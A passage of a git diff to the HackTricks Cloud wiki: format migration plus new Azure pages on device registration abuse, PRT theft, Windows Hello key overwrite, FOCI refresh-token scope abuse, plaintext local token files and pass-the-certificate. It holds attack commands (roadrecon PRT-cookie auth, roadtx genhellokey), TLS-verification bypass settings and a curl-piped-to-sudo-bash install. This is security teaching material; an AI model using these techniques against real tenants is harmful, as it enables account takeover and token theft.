### Azure Policies @@ -358,10 +341,7 @@ Azure policy json example: "policyRule": { "if": { "field": "location", - "notIn": [ - "eastus", - "westus" - ] + "notIn": ["eastus", "westus"] }, "then": { "effect": "Deny" @@ -380,7 +360,7 @@ In Azure **permissions are can be assigned to any part of the hierarchy**. That This hierarchical structure allows for efficient and scalable management of access permissions. -
+
### Azure RBAC vs ABAC 
@@ -392,23 +372,10 @@ You **cannot** explicitly **deny** **access** to specific resources **using cond ## References -* [https://learn.microsoft.com/en-us/azure/governance/management-groups/overview](https://learn.microsoft.com/en-us/azure/governance/management-groups/overview) -* [https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/organize-subscriptions](https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/organize-subscriptions) -* [https://abouttmc.com/glossary/azure-subscription/#:\~:text=An%20Azure%20subscription%20is%20a,the%20subscription%20it%20belongs%20to.](https://abouttmc.com/glossary/azure-subscription/) -* [https://learn.microsoft.com/en-us/azure/role-based-access-control/overview#how-azure-rbac-determines-if-a-user-has-access-to-a-resource](https://learn.microsoft.com/en-us/azure/role-based-access-control/overview#how-azure-rbac-determines-if-a-user-has-access-to-a-resource) -* [https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration](https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration) +- [https://learn.microsoft.com/en-us/azure/governance/management-groups/overview](https://learn.microsoft.com/en-us/azure/governance/management-groups/overview) +- [https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/organize-subscriptions](https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/organize-subscriptions) +- [https://abouttmc.com/glossary/azure-subscription/#:\~:text=An%20Azure%20subscription%20is%20a,the%20subscription%20it%20belongs%20to.](https://abouttmc.com/glossary/azure-subscription/) +- 
[https://learn.microsoft.com/en-us/azure/role-based-access-control/overview#how-azure-rbac-determines-if-a-user-has-access-to-a-resource](https://learn.microsoft.com/en-us/azure/role-based-access-control/overview#how-azure-rbac-determines-if-a-user-has-access-to-a-resource) +- [https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration](https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md b/src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md similarity index 62% rename from pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md rename to src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md index 59ef23f06..c244928d3 100644 --- a/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md +++ b/src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md @@ -1,21 +1,6 @@ # Az - Tokens & Public Applications - - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Basic Information 
@@ -32,41 +17,40 @@ Entra ID is Microsoft's cloud-based identity and access management (IAM) platfor **Scopes and Consent:** -* **Scopes:** Granular permissions defined on the resource server that specify access levels. -* **Consent:** The process by which a resource owner grants a client application permission to access resources with specific scopes. +- **Scopes:** Granular permissions defined on the resource server that specify access levels. +- **Consent:** The process by which a resource owner grants a client application permission to access resources with specific scopes. **Microsoft 365 Integration:** -* Microsoft 365 utilizes Azure AD for IAM and is composed of multiple "first-party" OAuth applications. -* These applications are deeply integrated and often have interdependent service relationships. -* To simplify user experience and maintain functionality, Microsoft grants "implied consent" or "pre-consent" to these first-party applications. -* **Implied Consent:** Certain applications are automatically **granted access to specific scopes without explicit user or administrator approva**l. -* These pre-consented scopes are typically hidden from both users and administrators, making them less visible in standard management interfaces. +- Microsoft 365 utilizes Azure AD for IAM and is composed of multiple "first-party" OAuth applications. +- These applications are deeply integrated and often have interdependent service relationships. +- To simplify user experience and maintain functionality, Microsoft grants "implied consent" or "pre-consent" to these first-party applications. +- **Implied Consent:** Certain applications are automatically **granted access to specific scopes without explicit user or administrator approva**l. +- These pre-consented scopes are typically hidden from both users and administrators, making them less visible in standard management interfaces. **Client Application Types:** 1. 
**Confidential Clients:** - * Possess their own credentials (e.g., passwords or certificates). - * Can **securely authenticate themselves** to the authorization server. + - Possess their own credentials (e.g., passwords or certificates). + - Can **securely authenticate themselves** to the authorization server. 2. **Public Clients:** - * Do not have unique credentials. - * Cannot securely authenticate to the authorization server. - * **Security Implication:** An attacker can impersonate a public client application when requesting tokens, as there is no mechanism for the authorization server to verify the legitimacy of the application. + - Do not have unique credentials. + - Cannot securely authenticate to the authorization server. + - **Security Implication:** An attacker can impersonate a public client application when requesting tokens, as there is no mechanism for the authorization server to verify the legitimacy of the application. ## Authentication Tokens There are **three types of tokens** used in OIDC: -* [**Access Tokens**](https://learn.microsoft.com/en-us/azure/active-directory/develop/access-tokens)**:** The client presents this token to the resource server to **access resources**. It can be used only for a specific combination of user, client, and resource and **cannot be revoked** until expiry - that is 1 hour by default. -* **ID Tokens**: The client receives this **token from the authorization server**. It contains basic information about the user. It is **bound to a specific combination of user and client**. -* **Refresh Tokens**: Provided to the client with access token. Used to **get new access and ID tokens**. It is bound to a specific combination of user and client and can be revoked. Default expiry is **90 days** for inactive refresh tokens and **no expiry for active tokens** (be from a refresh token is possible to get new refresh tokens). 
- * A refresh token should be tied to an **`aud`** , to some **scopes**, and to a **tenant** and it should only be able to generate access tokens for that aud, scopes (and no more) and tenant. However, this is not the case with **FOCI applications tokens**. - * A refresh token is encrypted and only Microsoft can decrypt it. - * Getting a new refresh token doesn't revoke the previous refresh token. +- [**Access Tokens**](https://learn.microsoft.com/en-us/azure/active-directory/develop/access-tokens)**:** The client presents this token to the resource server to **access resources**. It can be used only for a specific combination of user, client, and resource and **cannot be revoked** until expiry - that is 1 hour by default. +- **ID Tokens**: The client receives this **token from the authorization server**. It contains basic information about the user. It is **bound to a specific combination of user and client**. +- **Refresh Tokens**: Provided to the client with access token. Used to **get new access and ID tokens**. It is bound to a specific combination of user and client and can be revoked. Default expiry is **90 days** for inactive refresh tokens and **no expiry for active tokens** (be from a refresh token is possible to get new refresh tokens). + - A refresh token should be tied to an **`aud`** , to some **scopes**, and to a **tenant** and it should only be able to generate access tokens for that aud, scopes (and no more) and tenant. However, this is not the case with **FOCI applications tokens**. + - A refresh token is encrypted and only Microsoft can decrypt it. + - Getting a new refresh token doesn't revoke the previous refresh token. -{% hint style="warning" %} -Information for **conditional access** is **stored** inside the **JWT**. So, if you request the **token from an allowed IP address**, that **IP** will be **stored** in the token and then you can use that token from a **non-allowed IP to access the resources**. 
-{% endhint %} +> [!WARNING] +> Information for **conditional access** is **stored** inside the **JWT**. So, if you request the **token from an allowed IP address**, that **IP** will be **stored** in the token and then you can use that token from a **non-allowed IP to access the resources**. ### Access Tokens "aud" @@ -74,34 +58,33 @@ The field indicated in the "aud" field is the **resource server** (the applicati The command `az account get-access-token --resource-type [...]` supports the following types and each of them will add a specific "aud" in the resulting access token: -{% hint style="danger" %} -Note that the following are just the APIs supported by `az account get-access-token` but there are more. -{% endhint %} +> [!CAUTION] +> Note that the following are just the APIs supported by `az account get-access-token` but there are more.
aud examples -* **aad-graph (Azure Active Directory Graph API)**: Used to access the legacy Azure AD Graph API (deprecated), which allows applications to read and write directory data in Azure Active Directory (Azure AD). - * `https://graph.windows.net/` +- **aad-graph (Azure Active Directory Graph API)**: Used to access the legacy Azure AD Graph API (deprecated), which allows applications to read and write directory data in Azure Active Directory (Azure AD). + - `https://graph.windows.net/` -- **arm (Azure Resource Manager)**: Used to manage Azure resources through the Azure Resource Manager API. This includes operations like creating, updating, and deleting resources such as virtual machines, storage accounts, and more. - * `https://management.core.windows.net/ or https://management.azure.com/` +* **arm (Azure Resource Manager)**: Used to manage Azure resources through the Azure Resource Manager API. This includes operations like creating, updating, and deleting resources such as virtual machines, storage accounts, and more. + - `https://management.core.windows.net/ or https://management.azure.com/` -* **batch (Azure Batch Services)**: Used to access Azure Batch, a service that enables large-scale parallel and high-performance computing applications efficiently in the cloud. - * `https://batch.core.windows.net/` +- **batch (Azure Batch Services)**: Used to access Azure Batch, a service that enables large-scale parallel and high-performance computing applications efficiently in the cloud. + - `https://batch.core.windows.net/` -- **data-lake (Azure Data Lake Storage)**: Used to interact with Azure Data Lake Storage Gen1, which is a scalable data storage and analytics service. - * `https://datalake.azure.net/` +* **data-lake (Azure Data Lake Storage)**: Used to interact with Azure Data Lake Storage Gen1, which is a scalable data storage and analytics service. 
+ - `https://datalake.azure.net/` -* **media (Azure Media Services)**: Used to access Azure Media Services, which provide cloud-based media processing and delivery services for video and audio content. - * `https://rest.media.azure.net` +- **media (Azure Media Services)**: Used to access Azure Media Services, which provide cloud-based media processing and delivery services for video and audio content. + - `https://rest.media.azure.net` -- **ms-graph (Microsoft Graph API)**: Used to access the Microsoft Graph API, the unified endpoint for Microsoft 365 services data. It allows you to access data and insights from services like Azure AD, Office 365, Enterprise Mobility, and Security services. - * `https://graph.microsoft.com` +* **ms-graph (Microsoft Graph API)**: Used to access the Microsoft Graph API, the unified endpoint for Microsoft 365 services data. It allows you to access data and insights from services like Azure AD, Office 365, Enterprise Mobility, and Security services. + - `https://graph.microsoft.com` -* **oss-rdbms (Azure Open Source Relational Databases)**: Used to access Azure Database services for open-source relational database engines like MySQL, PostgreSQL, and MariaDB. - * `https://ossrdbms-aad.database.windows.net` +- **oss-rdbms (Azure Open Source Relational Databases)**: Used to access Azure Database services for open-source relational database engines like MySQL, PostgreSQL, and MariaDB. + - `https://ossrdbms-aad.database.windows.net`
@@ -155,10 +138,10 @@ pprint(decoded_access_token) # GET NEW ACCESS TOKEN AND REFRESH TOKEN new_azure_cli_bearer_tokens_for_graph_api = ( # Same client as original authorization - azure_cli_client.acquire_token_by_refresh_token( + azure_cli_client.acquire_token_by_refresh_token( azure_cli_bearer_tokens_for_graph_api.get("refresh_token"), # Same scopes as original authorization - scopes=["https://graph.microsoft.com/.default"], + scopes=["https://graph.microsoft.com/.default"], ) ) pprint(new_azure_cli_bearer_tokens_for_graph_api) @@ -182,14 +165,14 @@ Following with the previous example code, in this code it's requested a new toke # Code from https://github.com/secureworks/family-of-client-ids-research azure_cli_bearer_tokens_for_outlook_api = ( # Same client as original authorization - azure_cli_client.acquire_token_by_refresh_token( + azure_cli_client.acquire_token_by_refresh_token( new_azure_cli_bearer_tokens_for_graph_api.get( - "refresh_token" + "refresh_token" ), # But different scopes than original authorization scopes=[ - "https://outlook.office.com/.default" - ], + "https://outlook.office.com/.default" + ], ) ) pprint(azure_cli_bearer_tokens_for_outlook_api) @@ -215,19 +198,6 @@ pprint(microsoft_office_bearer_tokens_for_graph_api) ## References -* [https://github.com/secureworks/family-of-client-ids-research](https://github.com/secureworks/family-of-client-ids-research) +- [https://github.com/secureworks/family-of-client-ids-research](https://github.com/secureworks/family-of-client-ids-research) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-device-registration.md b/src/pentesting-cloud/azure-security/az-device-registration.md new file mode 100644 index 000000000..f3e004fac --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-device-registration.md 
@@ -0,0 +1,109 @@ +# Az - Device Registration + +{{#include ../../banners/hacktricks-training.md}} + +## Basic Information + +When a device joins AzureAD a new object is created in AzureAD. + +When registering a device, the **user is asked to login with his account** (asking for MFA if needed), then it request tokens for the device registration service and then ask a final confirmation prompt. + +Then, two RSA keypairs are generated in the device: The **device key** (**public** key) which is sent to **AzureAD** and the **transport** key (**private** key) which is stored in TPM if possible. + +Then, the **object** is generated in **AzureAD** (not in Intune) and AzureAD gives back to the device a **certificate** signed by it. You can check that the **device is AzureAD joined** and info about the **certificate** (like if it's protected by TPM).: + +```bash +dsregcmd /status +``` + +After the device registration a **Primary Refresh Token** is requested by the LSASS CloudAP module and given to the device. With the PRT is also delivered the **session key encrypted so only the device can decrypt it** (using the public key of the transport key) and it's **needed to use the PRT.** + +For more information about what is a PRT check: + +{{#ref}} +az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md +{{#endref}} + +### TPM - Trusted Platform Module + +The **TPM** **protects** against key **extraction** from a powered down device (if protected by PIN) nd from extracting the private material from the OS layer.\ +But it **doesn't protect** against **sniffing** the physical connection between the TPM and CPU or **using the cryptograpic material** in the TPM while the system is running from a process with **SYSTEM** rights. 
+ +If you check the following page you will see that **stealing the PRT** can be used to access like a the **user**, which is great because the **PRT is located devices**, so it can be stolen from them (or if not stolen abused to generate new signing keys): + +{{#ref}} +az-lateral-movement-cloud-on-prem/pass-the-prt.md +{{#endref}} + +## Registering a device with SSO tokens + +It would be possible for an attacker to request a token for the Microsoft device registration service from the compromised device and register it: + +```bash +# Initialize SSO flow +roadrecon auth prt-init +.\ROADtoken.exe + +# Request token with PRT with PRT cookie +roadrecon auth -r 01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9 --prt-cookie + +# Custom pyhton script to register a device (check roadtx) +registerdevice.py +``` + +Which will give you a **certificate you can use to ask for PRTs in the future**. Therefore maintaining persistence and **bypassing MFA** because the original PRT token used to register the new device **already had MFA permissions granted**. + +> [!TIP] +> Note that to perform this attack you will need permissions to **register new devices**. Also, registering a device doesn't mean the device will be **allowed to enrol into Intune**. + +> [!CAUTION] +> This attack was fixed in September 2021 as you can no longer register new devices using a SSO tokens. However, it's still possible to register devices in a legit way (having username, password and MFA if needed). Check: [**roadtx**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md). + +## Overwriting a device ticket + +It was possible to **request a device ticket**, **overwrite** the current one of the device, and during the flow **steal the PRT** (so no need to steal it from the TPM. For more info [**check this talk**](https://youtu.be/BduCn8cLV1A). + +
+ +> [!CAUTION] +> However, this was fixed. + +## Overwrite WHFB key + +[**Check the original slides here**](https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_nsec_v1.0.pdf) + +Attack summary: + +- It's possible to **overwrite** the **registered WHFB** key from a **device** via SSO +- It **defeats TPM protection** as the key is **sniffed during the generation** of the new key +- This also provides **persistence** + +
+ +Users can modify their own searchableDeviceKey property via the Azure AD Graph, however, the attacker needs to have a device in the tenant (registered on the fly or having stolen cert + key from a legit device) and a valid access token for the AAD Graph. + +Then, it's possible to generate a new key with: + +```bash +roadtx genhellokey -d -k tempkey.key +``` + +and then PATCH the information of the searchableDeviceKey: + +
+ +It's possible to get an access token from a user via **device code phishing** and abuse the previous steps to **steal his access**. For more information check: + +{{#ref}} +az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md +{{#endref}} + +
+ +## References + +- [https://youtu.be/BduCn8cLV1A](https://youtu.be/BduCn8cLV1A) +- [https://www.youtube.com/watch?v=x609c-MUZ_g](https://www.youtube.com/watch?v=x609c-MUZ_g) +- [https://www.youtube.com/watch?v=AFay_58QubY](https://www.youtube.com/watch?v=AFay_58QubY) + +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/azure-security/az-enumeration-tools.md b/src/pentesting-cloud/azure-security/az-enumeration-tools.md similarity index 68% rename from pentesting-cloud/azure-security/az-enumeration-tools.md rename to src/pentesting-cloud/azure-security/az-enumeration-tools.md index 68629756c..4ada66e88 100644 --- a/pentesting-cloud/azure-security/az-enumeration-tools.md +++ b/src/pentesting-cloud/azure-security/az-enumeration-tools.md @@ -1,44 +1,30 @@ # Az - Enumeration Tools -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ## Install PowerShell in Linux -{% hint style="success" %} -In linux you will need to install PowerShell Core: - -```bash -sudo apt-get update -sudo apt-get install -y wget apt-transport-https software-properties-common - -# Ubuntu 20.04 -wget -q https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb - -# Update repos -sudo apt-get update -sudo add-apt-repository universe - -# Install & start powershell -sudo apt-get install -y powershell -pwsh - -# Az cli -curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash -``` -{% endhint %} +> [!TIP] +> In linux you will need to install PowerShell Core: +> +> ```bash +> sudo apt-get update +> sudo apt-get install -y wget apt-transport-https software-properties-common +> +> # Ubuntu 20.04 +> wget -q https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb +> +> # Update repos +> sudo apt-get update +> sudo add-apt-repository universe +> +> # Install & start powershell +> sudo apt-get install -y powershell +> pwsh +> +> # Az cli +> curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash +> ``` ## Install PowerShell in MacOS @@ -89,8 +75,9 @@ az account management-group list --output table --debug In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can do: -{% tabs %} -{% tab title="Bash" %} +{{#tabs }} +{{#tab name="Bash" }} + ```bash export ADAL_PYTHON_SSL_NO_VERIFY=1 export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1 
@@ -103,17 +90,20 @@ export HTTP_PROXY="http://127.0.0.1:8080"
 openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM
 export REQUESTS_CA_BUNDLE=/Users/user/Downloads/cacert.pem
 ```
-{% endtab %}
-{% tab title="PS" %}
+{{#endtab }}
+
+{{#tab name="PS" }}
+
 ```bash
 $env:ADAL_PYTHON_SSL_NO_VERIFY=1
 $env:AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
 $env:HTTPS_PROXY="http://127.0.0.1:8080"
 $env:HTTP_PROXY="http://127.0.0.1:8080"
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 ### Az PowerShell
@@ -153,8 +143,7 @@ Get-MgUser -Debug
 The Azure Active Directory (AD) module, now **deprecated**, is part of Azure PowerShell for managing Azure AD resources. It provides cmdlets for tasks like managing users, groups, and application registrations in Entra ID.
-{% hint style="success" %}
-This is replaced by Microsoft Graph PowerShell
-{% endhint %}
+> [!TIP]
+> This is replaced by Microsoft Graph PowerShell
 Follow this link for the [**installation instructions**](https://www.powershellgallery.com/packages/AzureAD).
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md
new file mode 100644
index 000000000..d2cac1174
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md
@@ -0,0 +1,65 @@
+# Az - Lateral Movement (Cloud - On-Prem)
+
+## Az - Lateral Movement (Cloud - On-Prem)
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+### On-Prem machines connected to cloud
+
+There are different ways a machine can be connected to the cloud:
+
+#### Azure AD joined
+
+
+#### Workplace joined
+
+

https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large

+
+#### Hybrid joined
+
+

https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large

+
+#### Workplace joined on AADJ or Hybrid
+
+

https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large

+
+### Tokens and limitations
+
+In Azure AD, there are different types of tokens with specific limitations:
+
+- **Access tokens**: Used to access APIs and resources like the Microsoft Graph. They are tied to a specific client and resource.
+- **Refresh tokens**: Issued to applications to obtain new access tokens. They can only be used by the application they were issued to or a group of applications.
+- **Primary Refresh Tokens (PRT)**: Used for Single Sign-On on Azure AD joined, registered, or hybrid joined devices. They can be used in browser sign-in flows and for signing in to mobile and desktop applications on the device.
+- **Windows Hello for Business keys (WHFB)**: Used for passwordless authentication. It's used to get Primary Refresh Tokens.
+
+The most interesting type of token is the Primary Refresh Token (PRT).
+
+{{#ref}}
+az-primary-refresh-token-prt.md
+{{#endref}}
+
+### Pivoting Techniques
+
+From the **compromised machine to the cloud**:
+
+- [**Pass the Cookie**](az-pass-the-cookie.md): Steal Azure cookies from the browser and use them to login
+- [**Dump processes access tokens**](az-processes-memory-access-token.md): Dump the memory of local processes synchronized with the cloud (like excel, Teams...) and find access tokens in clear text.
+- [**Phishing Primary Refresh Token**](az-phishing-primary-refresh-token-microsoft-entra.md)**:** Phish the PRT to abuse it
+- [**Pass the PRT**](pass-the-prt.md): Steal the device PRT to access Azure impersonating it.
+- [**Pass the Certificate**](az-pass-the-certificate.md)**:** Generate a cert based on the PRT to login from one machine to another
+
+From compromising **AD** to compromising the **Cloud** and from compromising the **Cloud to** compromising **AD**:
+
+- [**Azure AD Connect**](azure-ad-connect-hybrid-identity/)
+- **Another way to pivot from could to On-Prem is** [**abusing Intune**](../az-services/intune.md)
+
+#### [Roadtx](https://github.com/dirkjanm/ROADtools)
+
+This tool allows to perform several actions like register a machine in Azure AD to obtain a PRT, and use PRTs (legit or stolen) to access resources in several different ways. These are not direct attacks, but it facilitates the use of PRTs to access resources in different ways. Find more info in [https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/](https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/)
+
+## References
+
+- [https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md
similarity index 63%
rename from pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md
rename to src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md
index 293feeb63..c2278da14 100644
--- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md
@@ -1,19 +1,6 @@
 # Az - Arc vulnerable GPO Deploy Script
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 ### Identifying the Issues
@@ -79,19 +66,6 @@ At this point, we can gather the remaining information needed to connect to Azur
 ## References
-* [https://xybytes.com/azure/Abusing-Azure-Arc/](https://xybytes.com/azure/Abusing-Azure-Arc/)
+- [https://xybytes.com/azure/Abusing-Azure-Arc/](https://xybytes.com/azure/Abusing-Azure-Arc/)
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md
new file mode 100644
index 000000000..e77b338ab
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md
@@ -0,0 +1,39 @@
+# Az - Local Cloud Credentials
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Local Token Storage and Security Considerations
+
+### Azure CLI (Command-Line Interface)
+
+Tokens and sensitive data are stored locally by Azure CLI, raising security concerns:
+
+1. **Access Tokens**: Stored in plaintext within `accessTokens.json` located at `C:\Users\\.Azure`.
+2. **Subscription Information**: `azureProfile.json`, in the same directory, holds subscription details.
+3. **Log Files**: The `ErrorRecords` folder within `.azure` might contain logs with exposed credentials, such as:
+ - Executed commands with credentials embedded.
+ - URLs accessed using tokens, potentially revealing sensitive information.
+
+### Azure PowerShell
+
+Azure PowerShell also stores tokens and sensitive data, which can be accessed locally:
+
+1. **Access Tokens**: `TokenCache.dat`, located at `C:\Users\\.Azure`, stores access tokens in plaintext.
+2. **Service Principal Secrets**: These are stored unencrypted in `AzureRmContext.json`.
+3. **Token Saving Feature**: Users have the ability to persist tokens using the `Save-AzContext` command, which should be used cautiously to prevent unauthorized access.
+
+## Automatic Tools to find them
+
+- [**Winpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe)
+- [**Get-AzurePasswords.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/AzureRM/Get-AzurePasswords.ps1)
+
+## Security Recommendations
+
+Considering the storage of sensitive data in plaintext, it's crucial to secure these files and directories by:
+
+- Limiting access rights to these files.
+- Regularly monitoring and auditing these directories for unauthorized access or unexpected changes.
+- Employing encryption for sensitive files where possible.
+- Educating users about the risks and best practices for handling such sensitive information.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md
new file mode 100644
index 000000000..54e834822
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md
@@ -0,0 +1,39 @@
+# Az - Pass the Certificate
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Pass the Certificate (Azure)
+
+In Azure joined machines, it's possible to authenticate from one machine to another using certificates that **must be issued by Azure AD CA** for the required user (as the subject) when both machines support the **NegoEx** authentication mechanism.
+
+In super simplified terms:
+
